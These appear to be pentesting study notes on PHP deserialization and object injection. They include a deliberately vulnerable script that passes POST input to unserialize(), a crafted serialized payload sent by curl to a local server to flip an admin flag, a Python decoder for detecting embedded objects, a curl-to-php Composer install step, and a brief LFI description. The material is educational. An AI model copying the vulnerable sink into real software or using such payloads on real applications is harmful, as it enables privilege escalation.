Interactive
$ pkg install php73-readline
$ php -a
php >
Composer
Packagist – The PHP Package Repository
$ curl -sS https://getcomposer.org/installer | php
Some settings on your machine make Composer unable to work properly.
Make sure that you fix the issues listed below and run this script again:

The phar extension is missing.
Install it or recompile php without --disable-phar
The filter extension is missing.
Install it or recompile php without --disable-filter

$ pkg install php73-phar
$ pkg install php73-filter
Serialization / Unserialization
- Object Injection
- Pop Chains
- Object Relation Mapper
- LFI Scripts
Intro to PHP Deserialization / Object Injection
Advanced PHP Deserialization – Phar Files
<?php
class User {
    public $username;
    public $isAdmin;

    // Prints whether this user is an admin, based on the isAdmin property
    public function PrintData() {
        if ($this->isAdmin) {
            echo $this->username . " is an admin\n";
        } else {
            echo $this->username . " is NOT an admin\n";
        }
    }
}

// Build an object and emit its serialized representation
$obj = new User();
$obj->username = 'ippsec';
$obj->isAdmin = true;
echo serialize($obj);
?>
Type:Length:Name of class/variable:How many items in the object
O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}
Type
O = Object
s = String
b = Boolean
<?php
// test.php: the User class from above must be defined in this file as well
$obj = unserialize($_POST['ippsec']);
$obj->PrintData();
$ php -S 127.0.0.1:8070 &
[1] 1245
PHP 7.3.26 Development Server started at Thu Jan 14 11:56:06 2021
Listening on http://127.0.0.1:8070
Document root is /usr/home/andreas/composer
Press Ctrl-C to quit.
$ curl -XPOST -d 'ippsec=O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}' localhost:8070/test.php
[Thu Jan 14 12:01:17 2021] 127.0.0.1:38066 [200]: /test.php
ippsec is an admin
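An added example (not from the page): a small Python decoder for the serialize() format shown above, so untrusted input can be inspected for embedded O: objects before PHP's unserialize() ever instantiates them (in PHP itself the equivalent guard is unserialize()'s allowed_classes option). It assumes the page's own User payload as constructed sample input.

```python
from collections import namedtuple
PhpObject = namedtuple("PhpObject", "cls props")   # an O:... value, decoded but never instantiated

def php_unserialize(data: bytes):
    """Decode PHP serialize() output (types O, a, s, i, b, N) without executing any of it."""
    pos = 0
    def expect(tok):
        nonlocal pos
        if not data.startswith(tok, pos):
            raise ValueError(f"expected {tok!r} at offset {pos}")
        pos += len(tok)
    def until(ch):                       # bytes up to the delimiter, delimiter consumed
        nonlocal pos
        end = data.index(ch, pos)
        tok, pos = data[pos:end], end + 1
        return tok
    def pairs(n):                        # {key;value;...}, shared by arrays and objects
        expect(b"{")
        out = {}
        for _ in range(n):
            key = value()                # key is parsed before its value
            out[key] = value()
        expect(b"}")
        return out
    def value():
        nonlocal pos
        t, pos = data[pos:pos + 1], pos + 1
        if t == b"N": expect(b";"); return None
        expect(b":")
        if t == b"b": return until(b";") == b"1"
        if t == b"i": return int(until(b";"))
        if t == b"s":                    # declared length counts bytes, not characters
            n = int(until(b":")); expect(b'"'); s, pos = data[pos:pos + n], pos + n; expect(b'";')
            return s.decode("utf-8", "replace")
        if t == b"a": return pairs(int(until(b":")))
        if t == b"O":
            n = int(until(b":")); expect(b'"'); cls, pos = data[pos:pos + n], pos + n; expect(b'":')
            return PhpObject(cls.decode(), pairs(int(until(b":"))))
        raise ValueError(f"unsupported type {t!r} at offset {pos - 1}")
    result = value()
    if pos != len(data): raise ValueError("trailing bytes after value")
    return result
def embedded_classes(v, found=None):     # every class a real unserialize() would instantiate
    found = [] if found is None else found
    if isinstance(v, PhpObject): found.append(v.cls); v = v.props
    if isinstance(v, dict):
        for item in v.values(): embedded_classes(item, found)
    return found

SAMPLE = b'O:4:"User":2:{s:8:"username";s:6:"ippsec";s:7:"isAdmin";b:1;}'   # the page's own payload
```

A non-empty result from embedded_classes() on request data is the signal to reject the input, since a plain data structure never needs an O: record.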
Local File Inclusion (LFI)
Local File Inclusion (LFI) — Web Application Penetration Testing
Local File Inclusion (LFI) allows an attacker to include files on a server through the web browser. This vulnerability exists when a web application includes a file without correctly sanitising the input, allowing an attacker to manipulate the input, inject path traversal characters and include other files from the web server.